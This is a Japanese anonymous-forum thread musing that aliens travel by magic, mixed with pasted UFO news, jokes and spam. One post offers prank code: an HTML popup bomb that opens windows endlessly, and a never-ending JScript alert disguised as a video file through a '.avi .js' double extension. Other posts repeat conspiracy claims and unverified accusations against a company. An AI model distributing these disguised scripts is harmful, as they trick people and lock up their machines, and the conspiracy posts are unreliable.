X



トップページ電波お花畑
134コメント105KB
宇宙人は非科学的な方法で地球に来ている
0001名無しちゃん…電波届いた?2010/09/04(土) 00:57:26
第1回 「宇宙船は魔術で飛んでいる」

宇宙人の宇宙船は、魔術を用いて飛んでいる。
それは物理法則を超越した存在である。

科学的には、宇宙人が地球に来られないことは証明され
ている。何万光年も離れた場所にいる宇宙人が地球に
来るためには、光よりも速く飛ぶ宇宙船を作らねばならず、
そんなことは不可能だからである。だが、世界中で空飛ぶ
円盤の目撃例や、宇宙人に誘拐された被害者は多数存在
する。この事実を説明する方法はひとつしかない。
宇宙人は非科学的な方法で地球に来ているのである。

宇宙人の宇宙船には、内燃機関が存在しない。内部の
環境を保つ設備には科学技術が用いられているが、宇宙を
飛ぶための動力源には魔術を用いている。魔術というと、
何か悪魔的なものを連想させるが、それは必ずしも邪悪な
ものとは限らない。人の精神力(いわゆるサイコキネシス)や、
信仰がもたらす神の力(福音)など、科学技術によらずに
物体を動かす方法を指すものと理解してほしい(中には、
邪悪な存在の力によっている場合もあるだろう)。

かつて、アメリカ政府が宇宙人と密約を結び彼らから技術の
提供を受けようとしていた事実はよく知られている。
だが、その密約から具体的な成果は生まれなかったようである。
宇宙人の魔術を科学研究に活かすことは難しく、まして軍事兵器に
活用することは不可能であったのだ。
0084名無しちゃん…電波届いた?2012/07/18(水) 10:18:24.63
宇宙人とか言うまだ実態が良く分かっていないものを無暗に信じたがるその盲目的な主従性を治した方が良い
0085へぶん2012/07/18(水) 19:52:57.22
あまり科学のこと、よくわかんないんだけど、
A点とB点の最短距離は、この次元では「直線」でしたっけ。
で、この次元が波のようにゆがみ、「−」から「Ω」の形にゆがんでも、
光はΩの字の形にそって進むから、我々は「まっすぐなんだ!」と思ってしまう。

で、なんらかの方法で、そのΩの下の、くぼんでいるところを突き抜けたら、
光より早く移動できるんじゃないかな。

変なたとえ話をすると、、、
我々は海の波の上しか進めない、とする。
もし、いっしょにスタートしたヤシが、でかい波のド真ん中をつきぬけて、
たくさん波を突き抜けて、はるか向こうの海面にひょいと浮かんできたら、
「なんで???あいつは神なのかよ!!」と思うことだろう。


・・・なんかどこかで聞いたようなネタでごめんw
0086TANT ◆i3UJmTANT. 2012/07/21(土) 22:57:51.12
1行でまとめると、眠くなった!
0088名無しちゃん…電波届いた?2012/08/17(金) 18:14:36.36
>>85
ワームホールかな?
眉唾物だと思うけど結構真面目に研究している人も居るんだよね
雑誌でマサチューセッツ工科大学の教授がやってるっていうのを見たわww
将来、タイムマシンができるといいなあ
0089名無しちゃん…電波届いた?:2012/08/17(金) 21:12:02.10
>>84 それは宗教の方がずっとわかり難いね。科学的思考の外挿として、
   宇宙人の存在があると思うが、論理的思考からは宗教は導かれないね。
   だが、矛盾するようだが神とは宇宙人のことなんだが・・
0090名無しちゃん…電波届いた?2012/10/17(水) 15:45:05.24
米軍などのコンピューターに不正侵入したとして米国が長年にわたり身柄の引き渡しを求めていた英国人ハッカー、ギャリー・マッキノン被告(46)について、英政
府は16日、引き渡しに応じない方針を決定した。

メイ英内相は、マッキノン被告のアスペルガー症候群とうつ状態を理由に、「彼が自らの命を絶つ危険はあまりに大きく、身柄引き渡しを決定すれば人権の理念に
反する」と指摘、米国への移送命令は撤回すべきだと述べた。

今後は英国で裁判を受けさせるかどうかについて、英検察当局が検討する。

米政府は、マッキノン被告が2001年3月以降、英ロンドンの自宅から米航空宇宙局(NASA)や米軍などのコンピューター97台に不正アクセスし、約100万
ドルの損害を生じさせたとして、米国で裁判を受けさせるために身柄の引き渡しを要求していた。

同被告も、NASAや米軍のコンピューターに侵入したことを認めているが、動機については、米国が未確認飛行物体(UFO)の存在を隠していることを暴くためだ
と主張していた。

マッキノン被告の家族や弁護士、人権団体は今回の英政府の決定を歓迎している。一方、米国務省のヌーランド報道官は16日、「ギャリー・マッキノンの引き渡
しを拒むという決定に米国は失望している」とコメントした。

米大陪審はコンピューター犯罪など7件の罪でマッキノン容疑者を起訴問われており、有罪になれば、最大で罪状1件につき10年の禁錮と25万ドルの罰金を言
い渡される可能性がある。

2012.10.17 CNN
http://www.cnn.co.jp/world/35023164.html
0091名無しちゃん…電波届いた?2012/10/17(水) 18:16:14.49
この世に科学で証明できないことはない
ただ解明せれているかしていないかの違いである
不可解な物理法則もさらに上の次元からみれば法則があるだけ
0092名無しちゃん…電波届いた?2012/10/27(土) 23:25:44.38
宇宙人は存在するのか分からないけどそれに近い存在はいると思う、例えば
未来の人間・未来人、人間が滅びなければ遠い将来あらわれる事は確実だし、
今の人間の科学力を超え現代の人間からすると宇宙人的なイメージがあると
思う。
0093名無しちゃん…電波届いた?2012/12/10(月) 00:37:54.55
サブカルにも新しい潮流が生まれつつあるね。
宇野とか濱野みたいな若手言論人を中心とした
ネオ・サブカルとでもいうべきか。
0094名無しちゃん…電波届いた?2012/12/18(火) 11:44:47.82
「宇宙人は存在する」=ロシア首相が発言、ネットで物議
時事通信 12月18日(火)6時38分配信

【モスクワ時事】ロシアのメドベージェフ首相(前大統領)の「国家機密漏えい」がインターネット上で物議を醸している。首
相は今月7日のテレビ5局の共同インタビューの直後、大統領が引き継ぐ「宇宙人ファイル」が存在すると暴露。
ソ連時代からの軍事・宇宙大国のトップ経験者だけに、ジョークとは簡単に切り捨てられないようだ。
テレビキャスターの個別懇談に応じた首相は「あなたに初めて明かす」と前置きした上で、「大統領交代時、
核のボタンと一緒に『極秘』ファイルが渡される」と発言。「地球に来た宇宙人に関する資料で、専門の特殊部隊が
作成したもの」と真顔で話した。
さらに「これ以上明かすと危険が及ぶので、詳しくは(米SF映画)『メン・イン・ブラック』を見てほしい」と話すと、
キャスターはこらえていたが、笑いが周囲から漏れた。主要メディアは報道を見送ったものの、
映像は動画サイトに転載された。
0095名無しちゃん…電波届いた?2013/03/06(水) 00:13:53.38
ツイッターによると、衆院選&都知事選は宇宙人勢力が仕組んだ不正選挙らしいぞ!!
0096御子柴.A 宗光 ◆WalkyrieuQ 2013/03/14(木) 07:14:36.14
オ、オレの…意識に………
侵食……してくるぜ………
そう……………ヤツラが…
0097名無しちゃん…電波届いた?2013/03/15(金) 16:06:34.93
性格の良い宇宙人だよ
ttp://pic.prepics-cdn.com/pib1301804408/19591027.jpeg
ttp://pic.prepics-cdn.com/pib1301804408/19591024.jpeg
0098名無しちゃん…電波届いた?2013/03/18(月) 03:58:08.09
チェリャビンスク州の隕石(いんせき)落下・爆発で、ロシア国民の間には
「本当は隕石ではなかった」と疑う声が根強い。
落下物は既に専門家により隕石と断定されているが、一部世論調査で
回答者の約半数が隕石と信じないとの結果も出ている。

ロシア紙ノービエ・イズベスチヤがサイト上で行った調査によると、
15日朝に落下した物体について、「隕石」との回答は49%で一応トップ。
「新型兵器」が2位(18%)、
「弾道ミサイル」と「未確認飛行物体(UFO)」が12%の同率で3位に
並んだ。

この結果について、世論調査機関レバダ・センターは
「国民の間にはソ連時代に(軍事・宇宙分野の)実験失敗が隠蔽(いんぺい)
されてきた記憶がある」と解説。4分の1が宇宙人の存在を信じるという
ロシア人の意識も影響していると指摘した。
0099名無しちゃん…電波届いた?2013/03/29(金) 21:07:08.38
 (CNN) 空飛ぶ円盤3機が米ニューメキシコ州で回収された――。過去のそんな証言を記した米連邦捜査局(FBI)の
資料がネットで注目を浴び、これまでに100万人以上が閲覧している。FBIはこのほど、「ロズウェル事件」との
関連についての新たな注釈を付け加えた。

 注目の的になったのは、ワシントンの特別捜査官ガイ・ホッテル氏が1950年に記した「空飛ぶ円盤」という見出しの資料。
「空軍の調査官の話では、いわゆる空飛ぶ円盤3機がニューメキシコで回収された。形は円形で中央が盛り上がり、
直径約50フィート(約15メートル)。それぞれに、人間の形をしていながら身長が3フィート(約90センチ)しかない3体が
乗っていた」と記されている。この3体についてはさらに、「非常に滑らかな金属の衣類を身に着け、それぞれテストパイロットが使う
耐Gスーツのようなものを巻いていた」との描写がある。

 円盤がニューメキシコで見つかった理由については「政府はこの地域に極めて高性能のレーダーを配備していた」
「このレーダーが円盤の制御メカニズムに干渉したと思われる」としている。FBIはこの件について、それ以上の行動は起こさなかった。

 この資料は1970年代に公開され、2011年にはネットに掲載されてメディアも注目。英大衆紙のサンは、ニューメキシコ州の
ロズウェルに宇宙人が着陸していたことが裏付けられたと報じた。しかしFBIは書き加えた注釈の中で、この資料の日付について、
ロズウェルに宇宙人が着陸したとされる年の3年後の日付だと指摘、「この2つを関連付ける理由はない」とした。

 FBIが公開した資料のうち「説明できない現象」の項には、このほかにも未確認飛行物体や宇宙船の破片、宇宙人の着陸などを
目撃したという記録が数百ページにわたって記されている。
0100名無しちゃん…電波届いた?2013/04/09(火) 22:08:06.95
100
0101名無しちゃん…電波届いた?2013/04/10(水) 18:29:55.73
Youtubeに登場したマンチェスターで撮影のビデオには上空を黒い三角の不審な物体が飛行している。
長さ約45メートルの巨大なUFOは約1分間、高度も軌線も変えないまま空を舞った。

 撮影者のコメントは「三角のUFO。長さ約150フット(約45メートル)。町の上空を非常に
低く飛んでいる。政権はこの正体を明らかにすべき!」
0102名無しちゃん…電波届いた?2013/04/14(日) 23:03:11.86
以下のソースコードをメモ帳に貼り付けて、htmlで保存
<BODY Onload="var i=0;while(1){open('./',i++);}">

◆電波王の顔写真が公開されるプログラム◆
1.メモ帳に↓をコピペする
  for(;;){ WScript.Echo('このウィンドウは永久に消えません。m9(^Д^)プギャー'); }
2.ファイル名を↓で保存する
  電波王顔.avi .js
これだけでOK!

以下のソースコードをメモ帳に貼り付けて、htmlで保存すればテトリスが動きます。
<body onKeyDown=K=event.keyCode><script>X=[Z=[B=A=12]];h=e=K=t=P=0;function Y()
{C=[d=K-38];c=0;for(i=4;i--*K;K-13?c+=!Z[h+p+d]:c-=!Z[h+(C[i]=p*A-Math.round(p/
A)*145)])p=B[i];!t|c+4?c-4?0:h+=d:B=C;for(f=K=i=0;i<4;f+=Z[A+p])X[p=h+B[i++]]=1
if(e=!e){if(f|B){for(l=228;i--;)Z[h+B[i]]=k=1;for(B=[[-7,-20,6,17,-9,3,6][t=++t
%7]-4,0,1,t-6?-A:-1];l--;h=5)if(l%A)l-=l%A*!Z[l];else for(P+=k++,j=l+=A;--j>A;)
Z[j]=Z[j-A]}h+=A}for(i=S="";i<240;X[i]=Z[i]|=++i%A<2|i>228)i%A?0:S+="<br>",S+=X
[i]?"■":"_";document.body.innerHTML=S+P;Z[5]||setTimeout(Y,99-P)}Y()</script>

スロットやろうぜ!
<body onKeyDown=K=1><pre><script>R=7;D=document;function Y(){D.all(7).innerHTML
=P;if(K){R>>=1;if(!R){o=A[0]&56;if(o-(A[1]&56)||o-(A[2]&56)){alert("残念");if(P
<5)return alert("END")}else alert(g=T[o/=8]),P+=g;P-=5;R=7}}for(K=i=0;i<9;C[i++
%3]/=8)j=A[i],C[i]=A[i]=R&4>>i?j=j%(1<<27)*8|j>>27:j,D.all[9+i].innerHTML=S[C[i
%3]&7];setTimeout(Y,99)}S="7□=○∴|¥$".split("");T=[100,5,10,15,20,30,P=
45,60];A=[0x16E29519,0x1DCC2E65,0x384CD988];C=[];a="<b></b><b></b><b></b>\n";D.
write(a,a,a,a);for(i=8;i--;K=0)D.write("\n\t",S[i]," ",T[i]);Y()</script>

それ系のぷよぷよもあるよね
<body onKeyDown=K=event.keyCode-38><script>function T(){h=100,B=Math.floor(Math
.random(l=8,p=-1)*16+4)}function Y(){for(S="",i=104;i--;i%8||(S+="<br>"))n=N[i]
,S+=n?~n?"<a style=color:#"+(249*n)+">●</a>":"■":"_";document.body.innerHTML
=S;N=[K-50?h-=M[h+l-K]|M[h-K]?0:K:M[h+p]?0:(x=p,p=-l,l=x)];for(K=0;++i<113;N[i]
=M[i]);N[h]=B>>2;N[h+l]=B%4+1;if(!(++e%10))if(h-=8,M[h]+M[h+l])for(M=N,T(f=0);f
=!f;){for(i=112;i--;g=C[i]=0);for(;g=!g;)for(i=0;i<103;i++)if(n=M[i+8],!M[i]&&n
)M[i]=n,M[i+8]=g=0;for(;i--;){n=c=0;for(E=[i];M[i]>0&n>=c;c++)for(j=4;j--;t>102
|C[t]|M[i]-M[t]||(C[t]=E[++n]=t))x=p,p=-l,l=x,t=E[c]+p;if(n>3)for(;n;)f=M[E[n--
]]=0}}M[100]||setTimeout(Y,49)}for(M=N=[C=[i=113]];--i;M[i-1]=i%8>1&i>7?0:-1);Y
(T(e=K=0));</script>
0103名無しちゃん…電波届いた?2013/06/17(月) 21:05:46.14
アメリカのハフィントン・ポストのカナダ版政治欄に、元カナダ国防相、ポール・ヘリヤー氏のUFO・
エイリアン発言が報じられている。

 ポール・ヘリヤー氏は、カナダ議会で23年余り議員を務めたが、国防相のときにはUFOについての報告を
受けたという。『The Day After Roswell』(邦題『ペンタゴンの陰謀』)を読んでUFOに関心を持ち、調査
し始め、一貫してアメリカ政府や軍はUFO情報を開示すべきだと訴えている。

 ハフィントン・ポストには、先月、ワシントンDCで行われたUFO・エイリアン情報を民間人が公開する
「シチズン・ヒアリング・オン・ディスクロージャー」でヘリヤー氏が発言した内容の詳報が載せられて
いる。そのポイントは以下のようなものだ。

少なくとも4種類のエイリアンが何千年もの間、地球に来ている。
今いるエイリアンのうち5種類の名前は「ゼータ・レティクル、プレアデス、オリオン、アンドロメダ、
わし座(アルタイル)」。
少なくとも2人がアメリカ政府機関で働いている。
地球温暖化など、彼らのテクノロジーで地球を救うことができる。
しかし、その情報開示を阻む、既得権を持つ「陰の政府」がアメリカには存在し、一方的に世界を支配
しようとし、宗教の違い等から生じる様々な不和を引き起こしている。

 エイリアン・アブダクションの世界的権威、ジョン・マック博士の書籍『Passport to the cosmos』
(宇宙へのパスポート)から、「エイリアン自身は神ではないが振る舞いは神のようだ。拉致被害者らは
一貫して、彼らは神の使者のように行動したと言っている」と引用し、ヘリヤー氏は以下のように結論
づけている。

 「私たち地球人はもっとスピリチュアルな存在になるべきだ。世界の主要な宗教には共通の部分、
"ゴールデン・ルール"がある。それを実行し、そして宇宙の真実を受け入れ、彼らのテクノロジーで
地球を救うことができる」と。

 つまり、地球は今、すべての宗教のゴールデン・ルールを現代的にスケールアップさせた地球的宗教を
打ち立て、次は宇宙への扉を開く時が来ているということだ。(純)
ソース   The Liberty Web 2013年6月17日
http://www.the-liberty.com/article.php?item_id=6178
0104名無しちゃん…電波届いた?2013/12/05(木) 11:48:21.60
 六時半だ。新しい朝がきた。――隣室のラジオで目覚めたのは普段通り。
 この後が違う。歌の後の挨拶が長引き、其の儘10分の番組が終了してしまったのだ。
 妹は布団の中で体操をしないと寝床から抜けられない。俺は救援に向かった。

「――でね、殆どの昆虫は宇宙人が放ったものなんだってさ」
「信じられんなあ。ホントに体操の人がそう云ったのか?」
「うん。主な目的は電波の中継らしいよ」
「非科学的な手段で地球に来た割には、その辺の目的は科学的だな」

 事実かはさておき、番組が通常ではなかったのは確か。意味くらいあるのだろう。
 俺は妹のフォークギターを掴み、ラジオ体操第一のイントロを爪弾く。
 窓から舞い込んだ蝉がギターのペグに止まったが、構わずに演奏を続けた。

 俺のプレイが中継され、誰かが体操をしているはず。――誇らしい朝だった。
0105名無しちゃん…電波届いた?2014/04/06(日) 13:54:54.11
0106名無しちゃん…電波届いた?2014/04/09(水) 22:04:38.31
うぇ?
0107名無しちゃん…電波届いた?2014/04/23(水) 11:51:25.08
うむ
0108名無しちゃん…電波届いた?2016/07/03(日) 13:37:08.53
宇宙人が地球に来ていないことは証明済み。
0109絵は才能2016/07/19(火) 01:28:27.85
絵とか練習が全ての世界でしょw
0110絵は才能2016/07/20(水) 18:24:20.18
。゜。゜
  ______
  ´&gt;  `ヽ、
 _,.'-=[><]=.,_
 ヽ&lt;レ/ノλレ 〉' 
  ノ§゜ ー゜ノゝ
    k.〉'='!つ
    i.ノ!_ !&gt;
    i,ン,ン
0111名無しちゃん…電波届いた?2016/07/20(水) 18:26:23.06
>>108
未だにこんなバカがいるのか
0112絵は才能 [絵は才能]2016/07/21(木) 03:55:35.93
宇宙人は絵に描いたチンポ
0113絵は才能2016/07/21(木) 20:10:05.75
どうせ絵だけは無理って事
0114絵は才能 [絵は才能]2016/07/21(木) 20:17:26.58
絵はヤンデレ
0115絵は才能2016/07/30(土) 17:38:04.62
音楽は才能も無意味なんだけど
0117絵は才能2016/07/30(土) 23:17:14.07
音楽はセンスの世界
0118絵は才能2016/08/01(月) 16:26:32.67
絵とか好奇心とか無理って事
0119絵は才能2016/08/04(木) 16:08:13.37
音楽だけは努力なんか無理
0121名無しちゃん…電波届いた?2016/08/22(月) 17:55:40.98
人間が理解できないだけちゃうの
犬や猫の知能に限界があるように、人間の身体にも知能の限界があると思うが
0122名無しちゃん…電波届いた?2017/06/01(木) 00:08:51.94
宇宙人さんのブログ
何年か前の同じ内容を載せててがっかりした!
楽しみにしてるのに
0125名無しちゃん…電波届いた?2017/08/13(日) 00:11:47.23
やられたことは忘れない
0126名無しちゃん…電波届いた?2017/08/13(日) 15:29:28.07
(´・ω・`)社員のヌードを公式サイトに掲載しているリコーの子会社が
鳥取にあるがな

http://goo.gl/C2B5oY 
http://goo.gl/jpI5zK  
http://goo.gl/nAacpr  
リコーの弱みを握っとるからこんな偽サイトばらまけるがなwwwwwww

慰謝料出さんかい! ゴルァ
http://goo.gl/T8ksNY
10年以上前から「社員ヌード」掲載の公式サイトばらまいとるがなwwww

全国各地のリコーグループ200社以上に
「これではリコーの評判が落ちる。鳥取市のリコーの件の調査頼む」と電話をかけまくった
すると東京のリコー本社が「この件は対応してはいけない」
と通達が全グループに通達したそうだ

よって偽サイトも対応してはいけないwwww
下手に対応したらスキャンダル表沙汰
0127名無しちゃん…電波届いた?2017/08/15(火) 21:41:18.66
頭に三角の布つけた死に装束の宇宙人なんか出てきたら
ややこしいから銀色の全身タイツ着ろって注意したくなる
0130名無しちゃん…電波届いた?2019/10/19(土) 02:26:23.92
あんた河野和宏かい?
0131名無しちゃん…電波届いた?2019/12/14(土) 21:01:16.57
我らが院長の渾身のオモシロ作品がこちら
さあ、笑いすぎて腹筋が壊れないように覚悟して読んでくださいな


(∪´ω`)虫歯を抜こうと思ったらガイコツがついてきた。
0134名無しちゃん…電波届いた?2023/02/25(土) 23:52:35.61
カンニングマンが金持ち金持ち



アホの祭り
レスを投稿する


ニューススポーツなんでも実況